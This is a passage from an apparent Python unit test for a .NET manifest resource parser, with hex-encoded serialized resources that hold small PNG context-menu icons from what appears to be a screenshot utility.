'000000044461746107020200000009030000000F03000000020200000289504E470D0A1A0A00' # ....Data......................PNG.....
'00000D49484452000000100000001008060000001FF3FF610000000467414D410000B18F0BFC' # ...IHDR................a....gAMA......
'61050000001974455874536F6674776172650041646F626520496D616765526561647971C965' # a.....tEXtSoftware.Adobe.ImageReadyq.e
'3C0000019449444154384FA5923D4B42511880DF83222A8A3A08A238E475137F40D007067ED0' # <....IDAT8O..=KBQ...."*.:..8.u..@...~.
'E2222E5EC3B8680D35DA90E0EEA05C903E694A2B41222A285AB2202842285A5CAC500882A068' # .".^..h.5.....\.>iJ+A"*(Z..(B(Z\.P...h
'6B104EEF95EEE596578C1A9E7338709EE7BCC3014AE9BFE82E6AB51A469127427A68238F5F3C' # k.N.....W...s8p.....J....j..F.'Bzh#._<
'1032D62064BF4EC8518D9009299056A91465013120CA1D9EA7AFE9343D003897024AA2881090' # .2..d.N.Q...).V..e.1.......4=.8..J....
'CBAD7098DE47A37413E072506004A9B60899559257018252A006D0C329409D562AB449C89E92' # ..p..G.t..rP`.....U.W..R....)@.V*.I...
'BC8C77A440C9EF87AD6010B64321897220C01E63A4532C2ACADF02B95C0EF2F93CF03CDFA550' # ..w.@....`..C!.r...c.S,*....\...<.<..P
'28B8B3D96C6AA17C97D9C5483312A1EB00D72B008BA2DC3720CA2FEF1F8D9D8BF6A1102961E4' # (...lj.|...H3.....+....7../........)a.
'0D2758C21D01919EC04FF9E4F679C3EBF5A6A6CC66162710E450DF00C2643299A45CF6783C49' # .'X......O...y......f.'..P...d2..\.x<I
'A7D3E98E198DB026137B022CCB02C77109B9CC304CC266B33176BB1D06067C3E9F2B363D3327' # .......&.{.,...q...0L.f.1v....|>.+6=3'
'CA28B2168BC565B55AE1570187C311175E1F1EF7CF1B0C86B85EAF1F32994CD02F50C28F5645' # .(....e.Z.W.....^........^..2.L./P..VE
'A4804EA79BD468341CC268B55AE10C4A810A4A57C80D72260FFC1D0A9FB590AA7EEAB5651300' # ..N...h4..h.Z..J..JW..r&........~..e..
'00000049454E44AE4260820B' # ...IEND.B`..
)
parsed = NetManifestResource(StreamReader(manifest))
self.assertEqual(len(parsed.Resources), 1)
def test_unpack_resource_multiple_entries(self):
manifest = bytes.fromhex(
'CECAEFBE01000000910000006C53797374656D2E5265736F75726365732E5265736F75726365' # ............lSystem.Resources.Resource
'5265616465722C206D73636F726C69622C2056657273696F6E3D322E302E302E302C2043756C' # Reader,.mscorlib,.Version=2.0.0.0,.Cul
'747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D623737613563353631' # ture=neutral,.PublicKeyToken=b77a5c561
'393334653038392353797374656D2E5265736F75726365732E52756E74696D655265736F7572' # 934e089#System.Resources.RuntimeResour
'6365536574020000000B000000010000006853797374656D2E44726177696E672E4269746D61' # ceSet............hSystem.Drawing.Bitma
'702C2053797374656D2E44726177696E672C2056657273696F6E3D322E302E302E302C204375' # p,.System.Drawing,.Version=2.0.0.0,.Cu
'6C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6230336635663766' # lture=neutral,.PublicKeyToken=b03f5f7f
'3131643530613361504144504144DF48D9870AD3D997445FB5FE149ACE239739B935A95BF838' # 11d50a3aPADPAD.H......D_.....#.9.5.[.8
'575A6D550C04985BCE56C3687AC5B96B4D8D3D7A960100006101000088000000310200001E01' # WZmU...[.V.hz..kM.=z....a.......1.....
'0000D30000003F00000000000000C701000068020000F8010000150400003A63006F006E0074' # ......?...........h...........:c.o.n.t
'006500780074006D0065006E0075005F00630061007000740075007200650061007200650061' # .e.x.t.m.e.n.u._.c.a.p.t.u.r.e.a.r.e.a
'002E0049006D00610067006500000000004463006F006E0074006500780074006D0065006E00' # ...I.m.a.g.e.....Dc.o.n.t.e.x.t.m.e.n.
'75005F00630061007000740075007200650063006C006900700062006F006100720064002E00' # u._.c.a.p.t.u.r.e.c.l.i.p.b.o.a.r.d...
'49006D00610067006500B30100004663006F006E0074006500780074006D0065006E0075005F' # I.m.a.g.e.....Fc.o.n.t.e.x.t.m.e.n.u._
'006300610070007400750072006500660075006C006C00730063007200650065006E002E0049' # .c.a.p.t.u.r.e.f.u.l.l.s.c.r.e.e.n...I
'006D00610067006500520500004663006F006E0074006500780074006D0065006E0075005F00' # .m.a.g.e.R...Fc.o.n.t.e.x.t.m.e.n.u._.
'63006100700074007500720065006C0061007300740072006500670069006F006E002E004900' # c.a.p.t.u.r.e.l.a.s.t.r.e.g.i.o.n...I.
'6D006100670065006F0800003E63006F006E0074006500780074006D0065006E0075005F0063' # m.a.g.e.o...>c.o.n.t.e.x.t.m.e.n.u._.c
'00610070007400750072006500770069006E0064006F0077002E0049006D0061006700650079' # .a.p.t.u.r.e.w.i.n.d.o.w...I.m.a.g.e.y
'0B00003063006F006E0074006500780074006D0065006E0075005F0064006F006E0061007400' # ...0c.o.n.t.e.x.t.m.e.n.u._.d.o.n.a.t.
'65002E0049006D006100670065009C0E00002C63006F006E0074006500780074006D0065006E' # e...I.m.a.g.e.....,c.o.n.t.e.x.t.m.e.n
'0075005F0065007800690074002E0049006D00610067006500161200002C63006F006E007400' # .u._.e.x.i.t...I.m.a.g.e.....,c.o.n.t.
'6500780074006D0065006E0075005F00680065006C0070002E0049006D006100670065006414' # e.x.t.m.e.n.u._.h.e.l.p...I.m.a.g.e.d.
'00003463006F006E0074006500780074006D0065006E0075005F006F00700065006E00660069' # ..4c.o.n.t.e.x.t.m.e.n.u._.o.p.e.n.f.i
'006C0065002E0049006D00610067006500CC1700003263006F006E0074006500780074006D00' # .l.e...I.m.a.g.e.....2c.o.n.t.e.x.t.m.
'65006E0075005F00700072006500730065006E0074002E0049006D006100670065008C1B0000' # e.n.u._.p.r.e.s.e.n.t...I.m.a.g.e.....
'3463006F006E0074006500780074006D0065006E0075005F00730065007400740069006E0067' # 4c.o.n.t.e.x.t.m.e.n.u._.s.e.t.t.i.n.g
'0073002E0049006D006100670065006D1F0000400001000000FFFFFFFF01000000000000000C' # .s...I.m.a.g.e.m...@..................
'020000005153797374656D2E44726177696E672C2056657273696F6E3D322E302E302E302C20' # ....QSystem.Drawing,.Version=2.0.0.0,.
'43756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D623033663566' # Culture=neutral,.PublicKeyToken=b03f5f
'3766313164353061336105010000001553797374656D2E44726177696E672E4269746D617001' # 7f11d50a3a......System.Drawing.Bitmap.
'000000044461746107020200000009030000000F03000000100100000289504E470D0A1A0A00' # ....Data......................PNG.....
'00000D49484452000000100000001008060000001FF3FF610000000467414D410000B18F0BFC' # ...IHDR................a....gAMA......
'61050000001974455874536F6674776172650041646F626520496D616765526561647971C965' # a.....tEXtSoftware.Adobe.ImageReadyq.e
'3C000000A249444154384F63F8FFFF3F45184CA4B4BD3990DAFEF67F5AC7BB34104D0C1BA407' # <....IDAT8Oc...?E.L...9.....Z..4.M....
'6E406CFD13B0042918A4076E003605C460B801AEE967487601480FDC00CBE87D241B00D20337' # n@l....)...n.6..`....gHv.H.....}$....7
'009B026230DC00358F3524BB00A4076E8092CB6A920D00E9811B804D0131186E80BAE70E925D' # ...b0..5.5$....n...j.......M.1.n.....]
'00D2033740D7FF28C90680F4C00DC0A680180C37C026EE3EC92E00E9811BE098FCE28063F24B' # ...7@..(...........7.&.>...........c.K
'B021209A38F60B4466221FFF6700006B9176AD1E7757250000000049454E44AE4260820B4000' # .!..8..Df"..g..k.v..wW%....IEND.B`..@.
'01000000FFFFFFFF01000000000000000C020000005153797374656D2E44726177696E672C20' # .....................QSystem.Drawing,.
'56657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C' # Version=2.0.0.0,.Culture=neutral,.Publ
'69634B6579546F6B656E3D623033663566376631316435306133610501000000155379737465' # icKeyToken=b03f5f7f11d50a3a......Syste
'6D2E44726177696E672E4269746D617001000000044461746107020200000009030000000F03' # m.Drawing.Bitmap.....Data.............
'000000FC0200000289504E470D0A1A0A0000000D49484452000000100000001008060000001F' # .........PNG........IHDR..............
'F3FF610000000467414D410000B18F0BFC61050000001974455874536F667477617265004164' # ..a....gAMA......a.....tEXtSoftware.Ad
'6F626520496D616765526561647971C9653C0000028E49444154384F8D926D48535118C7CF27' # obe.ImageReadyq.e<....IDAT8O..mHSQ...'
'13F24341E587EA5396AE54B435758A4D7251BE81B369CCCD9C36BB99CBD2CD740A5A6859A168' # ..CA...S..T.5u.MrQ...i...6.....t.ZhY.h
'BE646AAF6669A5A9A11586042568EE862F4199841889505F8A301305FF9D73CC3BC1842EFCEE' # .dj.fi......%h../A....P_.0....s.;.....
'3DFCCF737ECFE5DE8700E0548710096B98CC49ABD5C65084BFC4B06C794D956A91E5825A8AC8' # =..s~......T...k..I...P....lyM.j...Z..
'B8E04B861A72D2A7C6C63E81C1D62C5BDA67B52B04952A227EAC4E46C7C940F4F58D60707014' # ..K..r....>...,[.g.+..*"~.NF..@...`pp.
'E3E3931CB66619DBFB506904ABA5106B22BD2D09CA8389F8AECC80BB899EA83FEC863B093BD1' # .....f...Pi....k".-............?..;.;.
'74D4070F5276A3D1E8859BF1EEB897E48DE1D278B05AD32923D1E6E73B04A581441C2AD1A1F7' # t...Rv.............x.Z.)#...;...D.*...
'6C149E594238D7B23428CBD649D41424E1C67901165DE0677A58A0444982CB01447C7B290E2F' # l..YB8..4(..I..$..y..].gzX.DI...D|{)./
'F30E4A54E419E816B0F00FD8159D9B9B2A098A1544EC2FD2A0FB4C28EA6DB1B862D323CB26E0' # ..JT............*...D./...L(.m..b.#.&.
'F9C000B4E5761CB96A87B1C68ED4EB76D4BD18C5FCC202222C963449502827227BFDAE8CBD28' # .....v..j......v.......",.4IP('"{....(
'C98AA3D1EA9D1B7BFAF16B7E1EFBCDE6744950E04344F6DAADA97EC817C27987E1B64D9C9176' # .......{..k~....tIP.CD....~...y...M..v
'578C7450E893E5154FBAF17D7616C126538624C8F324E2D34C156EE93D909DA4E61D2E1E57E0' # W.tP....O..}v..&S.$..$..L.n.=.......W.
'7D9707BEBC96E1C7841A536FBC796E6BEAC1D79919F8E9F55649902D23625B5A006E1B64B01A' # }.........So.ynk........VI.-#b[Z.n.d..
'4379079DFF469C4B74434795377E4FA760F45530CFEB3A3BF16D6E0E5E1A4D8E24C8DC41C4C7' # Cy...F.KtCG.7~O.`.U0..:;.mn.^.M.$..A..
'54D040E72023611FEF70BF682DA7B9D805BDADEBD052E2C273A53AE8E70685A2D055A94C9604' # T.@..#a..p.h-........R..s.:......U.L..
'E9DBA8E0843F1F1673BC8A77989C9E5E01CB2383764D6EF1F12454E2182461EBA2A0D9E48BD3' # .....?..s..w...^..#.vMn..$T..$a.......
'87E43044AC42A41C6A0FD789E8EDEB4990FB668720761D11DBCD4AFE175AE8C77B24EC917878' # ..0D.B..j......I..f..v....J..Z..{$..xx
'4CCE6163CD60B51476C621085B436A0F3811F17F60B5E1CE84843B13F2078F6A56FE4EA4B3EB' # L.ac.`..v.!.[Cj.8...`.....;....jV.N...
'0000000049454E44AE4260820B400001000000FFFFFFFF01000000000000000C020000005153' # ....IEND.B`..@......................QS
'797374656D2E44726177696E672C2056657273696F6E3D322E302E302E302C2043756C747572' # ystem.Drawing,.Version=2.0.0.0,.Cultur
'653D6E65757472616C2C205075626C69634B6579546F6B656E3D623033663566376631316435' # e=neutral,.PublicKeyToken=b03f5f7f11d5
'3061336105010000001553797374656D2E44726177696E672E4269746D617001000000044461' # 0a3a......System.Drawing.Bitmap.....Da
'746107020200000009030000000F030000007A0200000289504E470D0A1A0A0000000D494844' # ta................z.....PNG........IHD
'52000000100000001008060000001FF3FF610000000467414D410000B18F0BFC610500000019' # R................a....gAMA......a.....
'74455874536F6674776172650041646F626520496D616765526561647971C9653C0000020C49' # tEXtSoftware.Adobe.ImageReadyq.e<....I
'444154384FA5914D6B13511486EF3E7F20BF201031268351820D35D6C80462078618310B858A' # DAT8O..Mk.Q...>.....1&.Q..5...b...1...
'465114A9544B41AAA254454551510489B8E842E2A2452BA1455ABF826612F3413E914024110C' # FQ..TKA..TEEQQ....B..E+.EZ..f..A>.@$..
'5850115D88AFF71D698812A4EAE26166CE3DCF7BEFB923C2E1F0A024FA8F0C8A5028B4A7DD6E' # XP.]....i.....af.=.{..#....$....P(...n
'A3D56AFD1574E80A5DD7F7369B4DAC198D63F5F8AC89FBF81CD69E7C04CFA979F44D3C41FFB9' # ..j..t..]..6.M...c.........|...y.M<A..
'E7D870E105FC970C04AE6611BE61800E5DA169DABE46A301E5580243F7DE2D0BFD561574E88A' # ..p.......f..a..].i..F...X.C..-..V.t..
'6030B8BF5EAF63E5E87D6CBD535F160CA04357A8AA7AA056ABC13E3285E0F54207F5CA2BF3D8' # `0..^.c..}l.S_...CW..z.V..>2...B...+..
'DE334FB14E8ED177F619D65F7C09FFB51C34194087AEF0FBFD07CBE532561C99C6A6CB690CC8' # .3O.N..w..._|....4.@........2V.....i..
'26CEED39BD604AFDF27B40CEADDE2C61F3EDD7D027DF60DBDDB7A04357F87CBE43854201ABC6' # &..9.`J..{@...,a....'.`....CW.|.C.B...
'66E0E38EF2C27A4961397B647A11DB1F7EC2D0830FA0435778BDDEE16C360B45DEFE1FA5B9AF' # f.....zIa9{dz...~.....CWx...l6.E......
'D835FF0DD1C7DF119DFD023A7485C7E3399C4EA71138BF808D72EE800CD064C016191091013B' # .5.........:t...9.N..8...r....d......;
'A6DE63E7CC47EC4E7C3645329C58041DBAC2ED768F188681542A854C26837C3E8F62B1884AA5' # ..c..G.N|6E2.X.....v....T*.L&.|>.b..J.
'826AF5E765F1592A95CC637367CA84AE501425E272B98EFE4E2C164337BD7AE80AF9229C4E67' # .j..e.Y*..csg...P.%.r...N,.C7.z...".Ng
'0787C321EC76FB583C1E4737AC71ADBB97EE2F01B24958AD567222994C2297CB99E37044D6B8' # ...!.v.X<.G7.q..../..IX.Vr".L"....pD..
'C69E9E01369B4D582C962526E43F9EEC86B5A575F6760200FC07103F0085774CF9F3F80DC300' # ....6.MX,.%&.?.....u.v.....?..wL......
'00000049454E44AE4260820B400001000000FFFFFFFF01000000000000000C02000000515379' # ...IEND.B`..@......................QSy
'7374656D2E44726177696E672C2056657273696F6E3D322E302E302E302C2043756C74757265' # stem.Drawing,.Version=2.0.0.0,.Culture
'3D6E65757472616C2C205075626C69634B6579546F6B656E3D62303366356637663131643530' # =neutral,.PublicKeyToken=b03f5f7f11d50
'61336105010000001553797374656D2E44726177696E672E4269746D61700100000004446174' # a3a......System.Drawing.Bitmap.....Dat
'6107020200000009030000000F03000000670200000289504E470D0A1A0A0000000D49484452' # a................g.....PNG........IHDR
'000000100000001008060000001FF3FF610000000467414D410000B18F0BFC61050000000970' # ................a....gAMA......a.....p
'48597300000EC200000EC20115284A800000001974455874536F6674776172650041646F6265' # HYs..........(J.....tEXtSoftware.Adobe
'20496D616765526561647971C9653C000001E449444154384FA58D4D48546114863F08347122' # .ImageReadyq.e<....IDAT8O..MHTa..?.4q"
'492785DCD4225CB9998D8984B4E96E1431B41F9420A652411DBAA6B432FC0F44572DAE9814FD' # I'..."\.......n.1.....RA....2..DW-....
'8144398D137AA3FC2909F5106220584C1618628CE34224AE139CCE7BB52F0431C1C573CFF77D' # .D9..z..)...b.XL..b..B$....{./.1..s..}
'E77D9FAB98795FB89F43654F5552E90397038516B00423A1F89E4ABEF050792E3D76E7DF0C40' # .}...y_..CeOUR........#...J..Py.=v...@
'6747C1C192FB4A8A0412CFF5197B157824600AB640E0EC449C313D171F1910C8B4B676C898E8' # gG....J......{.x$`..@..D.1=.......v...
'6841CAE57EF3E4ED779133CF979C9C81289F0A463937B8C29593EB2C3B1290A1FCC118178496' # hA..~...w.3.....(..F97.....,;.........
'9DEC96F71174B4E0E8B5A05DD4BFE06475CEACC99940FD8718637AAF0E1869FE174AA6853B32' # .....t.....]...du....@...cz...i..J..;2
'E5A145071D2DC8AC19A6F34F3EF36109A45785DD3B38563D6448504180997AFDA50F992BC1EF' # ..E..-.....O>.a..W..;8V=dHPA..z....+..
'8CBD169C681827FFB3AF9C5215A68C80AD8ED78F598221A1CD22A80829D903AA79B5C8E86841' # ....h.'....R........Y.!.."..)...y...hA
'56E314D50EFFE423D5432440E8E20AE49E76E38DC2FB16D430166374B420BB7D966E4DAC736A' # V......#.C$@.....v......0.ct...}.nM.sj
'E035092AA36E4465DE1C555EF3ED3F44821D328DD3BF181D2DF075CD53D34787E54F2461DFB6' # .5.*.nDe..U^..?D..2.....-.u.S.G..O$a..
'E2767CC8B4CDC6191D2DC8B9FBCD6E9ED970FCE1E89AB76E84760399D64F71071D2DC8EBF961' # .v|......-....n..p.....n.v...Oq..-...a
'960DAE463AE67E3BDD5F9877E38E64CAC3AB1174B4E074EF9227BF6FD9146C81FE0332263A5A' # ...F:.~;._.w..d....t..t..'.o..l...2&:Z
'B01F767CDC3BACFE00833F400D8FBCF1D10000000049454E44AE4260820B400001000000FFFF' # ..v|.;....?@.........IEND.B`..@.......
'FFFF01000000000000000C020000005153797374656D2E44726177696E672C2056657273696F' # ...............QSystem.Drawing,.Versio
'6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69634B657954' # n=2.0.0.0,.Culture=neutral,.PublicKeyT
'6F6B656E3D6230336635663766313164353061336105010000001553797374656D2E44726177' # oken=b03f5f7f11d50a3a......System.Draw
'696E672E4269746D617001000000044461746107020200000009030000000F03000000800200' # ing.Bitmap.....Data...................
'000289504E470D0A1A0A0000000D49484452000000100000001008060000001FF3FF61000000' # ...PNG........IHDR................a...
'0467414D410000B18F0BFC61050000001974455874536F6674776172650041646F626520496D' # .gAMA......a.....tEXtSoftware.Adobe.Im
'616765526561647971C9653C0000021249444154384FA5914168927118875FF0EC2110442F82' # ageReadyq.e<....IDAT8O..Ah.q.._..!.D/.
'5D0A12BAE461E0561B4624841385C2D84196115130886A5D0A16EC302258AD22B244CA30302C' # ]....a.V.F$.....A..Q0.j]...0"X.".D.00,
'C465468CE53E9B7391255F840533DD706A29CCDC075ABFBED7DA2DF88C5E786E0FEFFB7FF8D3' # .eF..>.s.%_..3.pj)...Z....-..^xn......
'C0DD75723A9D5D5C2E9751E6888CB707D8337617381C8E2DDC8220E4F2F93C445144369B4526' # ..ur:.]\..Q......3v.8..-......<DQD6.E&
'B384542A856452C0C2C26B08C21B2C2EE6303B9BCCB14F7BEF55BAD7ED763B73229148201E8F' # ..T*.dR...k...,..0;...O{.U...v;s".H...
'23168B211A8D221289201C0E23140A21180C221008C0EFF7C3E7F341A55279BB0BE4A7749117' # #..!..".....#..!.."........A.Ry....t..
'1DC73F0CFBB47F6AFEE8D08CB83C78EBF3CAC09DD5B6F7E9371C7BF2F5AF8C27EA481737D16E' # ..?....j.....<x.........7.{....'.H.7.n
'B7D1E974C02FA67DD3EF97C705E9C764F6272E67DAB82448B830F71D632F36309AD8C0F0CB26' # ...t./.}.......d.'.g..$H.0..c/60.....&
'FA5E6D627BBA8D1D2909679FD5D06AB52049126C36DB49EA9F160B7C75345283E77105238FD6' # .^mb{...).g...j..I.l6.I....|u4R..q.#..
'E07E58C4E1FB2B70FA3F61D8F711876E8B3878E31D0E5C7F8BA1AB4B68341A68369BB05AADA7' # .~X...+p.?a....n.8x...\....Kh4.h6..Z..
'69F066BEF027A9A7F184D751A95450AFD761B158C6A8FFDA8702F7709712EC8D8456512A9550' # i.f..'.....Q.TP..a.X.......p.....VQ*.P
'AD5661369BCF50DF956C817BB84B09F6DC0F0A2897CBA8D56A30994CE769CF64FA0BF7709712' # .Va6..P..l.{.K.....(....j0.L.i.d...p..
'ECED9AC874341ACD04A3D56A3DB4FBE27C917BB84B09F6D8D7E974A456AB495E42B4F3DCF322' # ....t4.....j=...|.{.K.....t.V.I^B...."
'F7709712ECB12FB7937CFDF702E3A948897BB84B09F6D897DB8931180C44DBEC53736AC7CC5A' # .p..../..|.....H.{.K......1..D..Ssj..Z
'AFB0AFD7EB690B92BFF63F00FD02D6F4D72DBEED798D0000000049454E44AE4260820B400001' # .....i....?......-..y.....IEND.B`..@..
'000000FFFFFFFF01000000000000000C020000005153797374656D2E44726177696E672C2056' # ....................QSystem.Drawing,.V
'657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69' # ersion=2.0.0.0,.Culture=neutral,.Publi
'634B6579546F6B656E3D6230336635663766313164353061336105010000001553797374656D' # cKeyToken=b03f5f7f11d50a3a......System
'2E44726177696E672E4269746D617001000000044461746107020200000009030000000F0300' # .Drawing.Bitmap.....Data..............
'0000D70200000289504E470D0A1A0A0000000D49484452000000100000001008060000001FF3' # ........PNG........IHDR...............
'FF610000000467414D410000B18F0BFC61050000001974455874536F6674776172650041646F' # .a....gAMA......a.....tEXtSoftware.Ado
'626520496D616765526561647971C9653C0000026949444154384FA5935D48D36114C69FCDCD' # be.ImageReadyq.e<...iIDAT8O..]H.a.....
'BE2C506BB56C3A9B435D51D066166906A5D0B7751144A4332A114CE8C68AA1D54559741139FA' # .,Pk.l:.C]Q.f.i....u.D.3*.L.....EYt.9.
'A0F022888282515DD8C265493956E66C630B5C10AB6D51891032376DE8E93D6B93A9DD75F183' # .."...Q]..eI9V.lc.\..mQ..27m..=k...u..
'F37FCEF33BBC377F10D17F010F748CD48B550D821702BBE099E098C8D3189E1319EFB8D3C00E' # ....;.7......t...U....................
'BB70A1186EE88C3ED5D60F6357EE8ED2032B45DA3AC29FD4956E919F64788E5CEC08D37D2B71' # .p..n..>...cW....+E.:....n..dx.\...}+q
'87BBECB00B278A240328B28D9EBB11FE6DBA4ED1432D143DDC4A63A6F671976CB583899EBA3A' # .....'.$.(......m.N.C-.=.Jc..q.l.....:
'CE19EFB8336A3287D96117EF5198DE2FD3F58D5FB843C3BB9A687847639C91BA560A561D0D05' # ....3j2..a..Q../..._.C...hxGc...V.V...
'2B8F84466A5BA672EE444D66EA4F2BEE63170E68656F255AC74853DB64A0BC96026535718215' # +..Fj[.r.DMf.O+.c..heo%Z.HS.d....e5q..
'75F463CF8989EFBB1B278215C6A99C3B43079B27D96117BDD0E035344F7FD69C0E7F361CA024' # u.c......'.....;C..'.a....54O.....6..$
'836BF7D1404115D973CAA9674929756719E2F4283690C7B03FCC0EBB78093563FAA8DFEB0F6D' # .k..@A..s..gI)ug...(6...?...x.5c.....m
'AF27DF9A6A72AA2AA85794DF64EA67F14EB5991C4B4BFCECB00B1B72D1855C8D4D966FFFBAF3' # .'..jr.*.W..d.g.N...KK.....r..\.M.o...
'78C4BD7C133945F15F0C2C5E4FAEFC2D912E699E3DEE0817CFA18AD38915C6EE8C42D7177D75' # x..|.9E._.,^O..-..i.=............B..}u
'CC278A834248C5275EE4CB298BD9E42B5DDC4D7A78026512C963289B6D0B0ABCDFB4DB62A1EC' # .'..BH.'^..)...+].Mzx.e..c(.m......b..
'120A09318E90038AD25857BADACB1DEE26BDD403B06099F4111467AC73F23CC3CA8DB15F4264' # ...1.....XW.....&....`....g.s.<...._Bd
'86B2F431AB4CE5E11D77529D9907700FD9D2DB5864B2C815DE48E6BA09C622537839E31D7752' # ...1.L...wR...p....Xd....H...."Sx9..wR
'9D691F8903B8867969972137DBE62AFD0CCF9CF16ED6815B5838C54D64A01DF37109729C8744' # .i.....yi.!7..*.....n..[X8.Md...q.r..D
'791678C5F0CC19EFB893EA24FF463C8402A23C93FA04D372EEFEF574F803C04FB10F2023ED78' # y.x........$.F<...<....r...t...O...#.x
'0000000049454E44AE4260820B400001000000FFFFFFFF01000000000000000C020000005153' # ....IEND.B`..@......................QS
'797374656D2E44726177696E672C2056657273696F6E3D322E302E302E302C2043756C747572' # ystem.Drawing,.Version=2.0.0.0,.Cultur
'653D6E65757472616C2C205075626C69634B6579546F6B656E3D623033663566376631316435' # e=neutral,.PublicKeyToken=b03f5f7f11d5
'3061336105010000001553797374656D2E44726177696E672E4269746D617001000000044461' # 0a3a......System.Drawing.Bitmap.....Da
'746107020200000009030000000F03000000AB0100000289504E470D0A1A0A0000000D494844' # ta......................PNG........IHD
'52000000100000001008060000001FF3FF610000000467414D410000B18F0BFC610500000020' # R................a....gAMA......a.....
'6348524D00007A26000080840000FA00000080E8000075300000EA6000003A98000017709CBA' # cHRM..z&..............u0...`..:....p..
'513C0000013649444154384FA590AD4B436114C6CFBF30D8EADAEA60656D7160182CAC8E892B' # Q<...6IDAT8O...KCa....0....`emq`.,...+
'AB63E0D6355834685150F00B5144B0088AC124A65730080A563158AC62F0F1795EBD4378CFC0' # .c..5X4hQP..QD....$.W0..V1X.b..y^.Cx..
'8FF070EE39BFDF7D2E5C03F0AFB8C7DF64FCB06F668766534CD0D4BEFB158F79050201A31134' # ..p.9..}.\......d..of.fSL......y.....4
'B57F2B88ECB5DF1FB3A48062781F0E71DB68E06D30807646254A78EE76237B6CB7234B0AB629' # ..+........bx..q.h.m0.vF%Jx.v#{l.#K..)
'6E11BCF47AB8A856F1D4E940BB72D76CC6DB75BD1E6F72930202DB2058A7F0D06AE1B45CC655' # n...z..V...@.r.l..u..or.....X...j..\.U
'AD86F34A059B85020E8A4588C991EB1650B0350AAB144F4A25ECE472317BF93C741393E3162C' # ...J......E.....P.5...OJ%..r1{.<t....,
'F0B8C42C535AA17CCCAF1EF1E52CBA89C991EB162C7E0AE18C2F78119333A940205C52CCA27D' # ...,SZ.|.....,......,~.../x..3.@.\R..}
'C22DFD8973043714B2689FA7A8782C2998A53820B8A7A0A99DA28A5D961410D80CC134054DED' # .-..s.7..h...x,)..8........]......4.M.
'5981C79282BFC63DFE3CB00FB3670FD6C10B84B70000000049454E44AE4260820B4000010000' # Y......=.<...g..........IEND.B`..@....
'00FFFFFFFF01000000000000000C020000005153797374656D2E44726177696E672C20566572' # ..................QSystem.Drawing,.Ver
'73696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69634B' # sion=2.0.0.0,.Culture=neutral,.PublicK
'6579546F6B656E3D6230336635663766313164353061336105010000001553797374656D2E44' # eyToken=b03f5f7f11d50a3a......System.D
'726177696E672E4269746D617001000000044461746107020200000009030000000F03000000' # rawing.Bitmap.....Data................
'C50200000289504E470D0A1A0A0000000D49484452000000100000001008060000001FF3FF61' # ......PNG........IHDR................a
'0000000467414D410000B18F0BFC6105000000206348524D00007A26000080840000FA000000' # ....gAMA......a.....cHRM..z&..........
'80E8000075300000EA6000003A98000017709CBA513C0000025049444154384FA58C5D685261' # ....u0...`..:....p..Q<...PIDAT8O..]hRa
'18C74F9324AAD54DA3CD208C7DD864A1863359EDA3116D7360A3B69576B1697E8541C3252B06' # ..O.$..M....}.d..3Y...ms`...v.i~.A.%+.
'115D6C591015ACA0B4A0185DC42A36B754B4CC085B19B6A0F223C3311AB450D8CEE94E793ACF' # .]lY.......].*6.T...[....#.1..P...Ny:.
'4177B2D64DBDF07B79789EFFFF4700C07FC17C9C9A0982B36392E0885C34EE528ED8A3A3B949' # Aw..M..{yx...G....|.....c...\4.R.....I
'339503671D73C30C66E9CE4A82D662B96F62AF291A335E4A2DF65FA73296112A63B0A5161B0D' # 3..g.s..f..J..b.ob.).3^J-._.2..*c.....
'9118DE30F337416B49833F60BC9822F5C3DFA1C31229403FBC00DAA1057253FDB300667F138C' # ...0.7AkI.?`.."......)@?.....rS...f...
'9715D7BA9CBAA16FA46A30098A13EFE975E13B75390678539F9D23D74B9F38B143AF7302E123' # .......o.j0.....u.;u9.xS..#.K.8.C.s..#
'FD1ECD4CBCFBF46750F67D8436F30C5CBDFB81612A30CF08EC6349E676C81A839D87A7E3D859' # ...L...gP.}.6..\...a*0...cI.v........Y
'1614091E38BACF24965A8E87214FB3EE35EC52F9C17A2100A15008066C5EA8D83F0602C56390' # ....8..$.Z..!O..5.R..z!..P..l^..?...c.
'A99E2F61871554DE77AB0613997D86103469A741D2E90341FB24A8FB7D100ECFC0E8C32054B5' # ../a..T.w....}..4i.A...A.$..}.......T.
'8D4395C2C940DF33D86105E5F73C5D03D1ECEE9E575073D00FC28EA7B05DE986783CCE50ADF4' # .C...@.3.a...<].....WPs......]..x<.P..
'30BB3CA2AE40163BAC807FE776B3FE1D2956BD01D11196EA035E865F7788B0E325891D56B0F5' # 0.<..@.;....v...)V.......^._w...%..V..
'96A9B2C597901F8B426D6F8441AC7A0BE9749A01E7FC1EE1D5BBBE6087156CB951B6669BDD25' # ........Bmo.A.z..t.........`..l.Q.f..%
'D7C4A83AD33CD419BF82B4E7D3B20067DC2192A3118ACBB7BBB0C30A78234451E935C5BA0A47' # ...:.<.........g.!..........x#DQ.5...G
'50A69DA51A4F2E42038D441D66C01991F626A9B5E58E2066B15328D87C8558B5F17C3BB7C4E6' # P....O.B..D.f....&.....f.S(.|.X..|;...
'E5D7BB66659A39AAA9EF4716C1197778C30C6657166C3847105C2B8F586D31D38CD2BCC881B3' # ...fe.9...G...wx..fW.l8G.\+.Xm1.......
'196F98F943F0EF00F113ECA941910DBFDB270000000049454E44AE4260820B400001000000FF' # .o..C.......A....'....IEND.B`..@......
'FFFFFF01000000000000000C020000005153797374656D2E44726177696E672C205665727369' # ................QSystem.Drawing,.Versi
'6F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69634B6579' # on=2.0.0.0,.Culture=neutral,.PublicKey
'546F6B656E3D6230336635663766313164353061336105010000001553797374656D2E447261' # Token=b03f5f7f11d50a3a......System.Dra
'77696E672E4269746D617001000000044461746107020200000009030000000F030000001D03' # wing.Bitmap.....Data..................
'00000289504E470D0A1A0A0000000D49484452000000100000001008060000001FF3FF610000' # ....PNG........IHDR................a..
'000467414D410000B18F0BFC61050000001974455874536F6674776172650041646F62652049' # ..gAMA......a.....tEXtSoftware.Adobe.I
'6D616765526561647971C9653C000002AF49444154384F8D925B48936118C79F8BC80E181116' # mageReadyq.e<....IDAT8O..[H.a.........
